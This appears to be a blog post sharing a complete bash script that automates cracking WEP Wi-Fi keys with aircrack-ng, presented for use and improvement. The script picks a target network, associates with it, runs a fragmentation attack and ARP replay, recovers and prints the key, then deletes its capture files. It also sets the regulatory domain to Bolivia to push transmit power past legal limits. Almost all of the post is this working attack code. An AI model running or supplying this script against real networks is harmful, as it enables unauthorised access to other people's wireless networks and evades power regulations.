I have wrote an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#!/bin/bash
# wepcrack.sh v1.3
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.3"
#
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.3 - Randomises interface MAC address
# Version 1.2 - Set txpower of card to 1000mw :-)
# Version 1.1 - Display key and BSSID at end of crack
# Version 1.0 - First Release

#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
    echo "MESSAGE:"
    echo "MESSAGE: ERROR: Please run as root!"
    echo "MESSAGE:"
    exit 1
fi

#################################################################
# CHECKING TO SEE IF INTERFACE IS PROVIDED
#################################################################
if [ -z ${1} ]
then
    echo "MESSAGE: Version number ${VERSION}"
    echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel]"
    echo "MESSAGE: Example #`basename ${0}` wlan0 (everything else is optional)"
    exit 1
else
    INTERFACE="`echo "${1}" | cut -c 1-6`"
fi

#################################################################
# PUT WIFI IN HIGHPOWER AND MONITOR MODE AND CHANGE MAC
#################################################################
#macchanger -r ${INTERFACE}
iw reg set BO
iwconfig ${INTERFACE} txpower 30
POWER=`iwlist ${INTERFACE} txpower | grep Current | tr -s ' ' | cut -d '(' -f2 | sed -e s/')'//`
echo "MESSAGE: ${INTERFACE} power set to ${POWER}"
echo "MESSAGE: Putting ${INTERFACE} in monitor mode"
airmon-ng start ${INTERFACE}

#################################################################
# GET INTERFACE MAC ADDRESS
#################################################################
MACADDRESS=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`

#################################################################
# CHECK IF BSSID,CHANNEL & TARGETNAME WERE PROVIDED
#################################################################
if [ -z ${2} ] || [ -z ${3} ] ; then
    #################################################################
    # SHOW VISIBLE WEP NETWORKS
    #################################################################
    echo "MESSAGE: Will now display all visible WEP networks"
    echo "MESSAGE: Once you have identified the network you wish to target press Ctrl-C to exit"
    read -p "MESSAGE: Press enter to view networks"
    airodump-ng --encrypt WEP ${INTERFACE} # mon0

    #################################################################
    # USER INPUT DETAILS FROM AIRODUMP
    #################################################################
    while true
    do
        echo -n "MESSAGE: Please enter the target BSSID here: "
        read -e BSSID
        echo -n "MESSAGE: Please enter the target channel here: "
        read -e CHANNEL
        echo "MESSAGE: Target BSSID            : ${BSSID}"
        echo "MESSAGE: Target Channel          : ${CHANNEL}"
        echo "MESSAGE: Interface MAC Address   : ${MACADDRESS}"
        echo -n "MESSAGE: Is this information correct? (y or n): "
        read -e CONFIRM
        case $CONFIRM in
                y|Y|YES|yes|Yes)
                break ;;
                *) echo "MESSAGE: Please re-enter information"
        esac
    done
fi

#################################################################
# START AIRODUMP IN XTERM WINDOW
#################################################################
echo "MESSAGE: Starting packet capture - Ctrl-c to end it"
xterm -e "airodump-ng -c ${CHANNEL} --bssid ${BSSID} --ivs -w capture ${INTERFACE}" & AIRODUMPPID=$!
sleep 2

#################################################################
# ASSOCIATE WITH AP & THEN PERFORM FRAGMENTATION ATTACK
#################################################################
aireplay-ng -1 0 -a ${BSSID} -h ${MACADDRESS} ${INTERFACE}
aireplay-ng -5 -b ${BSSID} -h ${MACADDRESS} ${INTERFACE}
packetforge-ng -0 -a ${BSSID} -h ${MACADDRESS} -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet ${INTERFACE}
xterm -e "aireplay-ng -2 -r arp-packet ${INTERFACE}" & AIREPLAYPID=$!

#################################################################
# ATTEMPTING TO CRACK
#################################################################
#while true
#do
    aircrack-ng -n 128 -b ${BSSID} *.ivs -l key.txt
#   echo -n "MESSAGE: Did you get the key?: (y or no)"
#   read -e CONFIRM
#   case $CONFIRM in
#           y|Y|YES|yes|Yes)
#           break ;;
#           *) echo "MESSAGE: Will attempt to crack again..." && sleep 3
#   esac
#done

#################################################################
# OUTPUT BSSID AND KEY
#################################################################
KEY=`cat key.txt`
echo "MESSAGE: Target BSSID            : ${BSSID}"
echo "MESSAGE: Target Key              : ${KEY}"


#################################################################
# DELETE FILES CREATED DURING WEP CRACKING
#################################################################
kill ${AIRODUMPPID}
kill ${AIREPLAYPID}
airmon-ng stop mon0
rm *.ivs *.cap *.xor key.txt
exit 0

Leave a Reply